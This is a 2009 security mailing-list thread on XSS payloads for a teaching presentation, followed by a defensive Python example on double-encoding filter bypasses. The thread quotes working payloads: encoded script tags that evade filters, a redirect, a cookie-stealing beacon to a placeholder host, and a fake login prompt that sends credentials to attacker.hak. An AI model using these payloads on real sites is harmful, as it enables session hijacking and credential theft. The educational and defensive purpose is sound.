PaulDotCom mailing list archives
Cool things to inject via XSS
From: trklisted at networksamurai.org (mOses)
Date: Fri, 29 May 2009 10:50:53 -0400
Adrian,

On May 28, 2009, at 2:50 PM, Adrian Crenshaw wrote:
> Ok, I've got yet another presentation coming up, this time on the OWASP Top 10 and Mutillidae. One of the things I'm going to cover is XSS. The canonical example of course is:
>
> <script>alert("XSS");</script>
>
> but that is boring, and gives folks the impression that XSS is not that serious. Better short examples would be:
One of the more interesting challenges with web applications is the fact that the browser supports multiple encoding types and double-encoded entries. Here is a SIMPLE double encode of your alert:

<script>alert('WEEEE');</script>

Hex encode the < and / tags:

%3Cscript%3Ealert('WEEEE');%3C%2Fscript%3E

Maybe you can avoid simple single-decode filtering by encoding the % in the '%3C':

%253Cscript%253Ealert('WEEE');%253C%252Fscript%253E

We can go further and continue to obfuscate things and bypass more and more filters.
> Redirect traffic to your site:
>
> <script>window.location = "http://www.irongeek.com/"</script>
>
> A little cookie grabbing:
>
> <script> new Image().src="http://some-ip/mutillidae/catch.php?cookie="+encodeURI(document.cookie); </script>
In addition, it's also worthwhile to note that you do not even need to have a real running webserver on this particular http://some-ip/mutillidae/. The important thing to note is what the browser is understanding here.

http://some-ip/catch.php?   <- this script doesn't technically need to exist.

cookie="+   <--- this is the part that is telling the browser: hey, in the actual URL stream, append something beyond the cookie= field.

+encodeURI(document.cookie);   <- HEY, in the URI field insert your current cookie from this current site and send it in the raw URL.

If you have a backdoor listening shell then you will get the cookie in a URI-encoded format showing up in your listener as a RAW HTTP request.
> Or maybe a password form to make people think they have to login, but it just grabs the credentials:
>
> <script> username=prompt('Please enter your username',' '); password=prompt('Please enter your password',' '); document.write("<img src=\"http://attacker.hak/catch.php?username="+username+"&password="+password+"\">"); </script>
>
> What are other cool things to inject, besides maybe BeEF, that show off how XSS can be a big deal?
Other uses include a distributed port scanner in JavaScript, leveraging the browser to send a port scan and scan the network that she is on.
> Thanks,
> Adrian

_______________________________________________
Pauldotcom mailing list
Pauldotcom at mail.pauldotcom.com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
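The double-encoding point in the reply above (a filter that decodes once is bypassed by encoding the % itself) is easiest to see with the filter on one side and the fix on the other. The following is an added example written for this archive page, not code from either poster: it contrasts a decode-once filter with one that canonicalises the input to a stable decoding before inspecting it, and shows HTML output encoding as the backstop that makes the payload inert even when filtering fails. The sample strings are constructed from the payloads quoted in the thread, and every function and constant name is this example's own.

```python
"""Added example (not from the mailing-list post): why a filter that
URL-decodes once is bypassed by the double-encoded payload quoted in the
thread, and the two defender-side fixes: canonicalise to a stable decoding
before inspecting, and HTML-escape on output regardless. Every function and
constant name here is this example's own."""
import html
from urllib.parse import unquote

# Constructed samples modelled on the payloads in the thread (same alert text
# in all three so that the decoded forms compare equal).
PLAIN = "<script>alert('WEEEE');</script>"
SINGLE = "%3Cscript%3Ealert('WEEEE');%3C%2Fscript%3E"
DOUBLE = "%253Cscript%253Ealert('WEEEE');%253C%252Fscript%253E"

# Upper bound on decode rounds; input still changing after this is treated as hostile.
MAX_DECODE_ROUNDS = 5


def naive_filter_blocks(value: str) -> bool:
    """The weak filter the post describes: decode once, then look for a script tag.
    Returns True when the input is blocked."""
    return "<script" in unquote(value).lower()


def canonicalize(value: str) -> str:
    """Decode repeatedly until the value stops changing, so that %253C, %3C and
    '<' all reduce to the same string. Raises ValueError if the input does not
    settle within MAX_DECODE_ROUNDS (encodings can be stacked arbitrarily deep,
    so the loop must be bounded)."""
    current = value
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(current)
        if decoded == current:
            return current
        current = decoded
    raise ValueError("input did not reach a stable decoding")


def canonical_filter_blocks(value: str) -> bool:
    """Inspect the fully decoded form; an unstable decoding is blocked outright."""
    try:
        return "<script" in canonicalize(value).lower()
    except ValueError:
        return True


def render_safely(value: str) -> str:
    """Output encoding for an HTML text context: even if a payload slips past
    every input filter, the browser is handed inert text rather than markup."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for label, sample in (("single", SINGLE), ("double", DOUBLE)):
        print(label, "naive blocks:", naive_filter_blocks(sample),
              "canonical blocks:", canonical_filter_blocks(sample))
    print(render_safely(PLAIN))
```

Running it shows the naive filter catching the single-encoded form but passing the double-encoded one, while the canonicalising filter blocks both; the last line is the escaped markup a browser would display as literal text. The bounded loop matters: an input that is still changing after the limit is rejected rather than decoded further, which is the conservative choice when canonicalisation cannot finish.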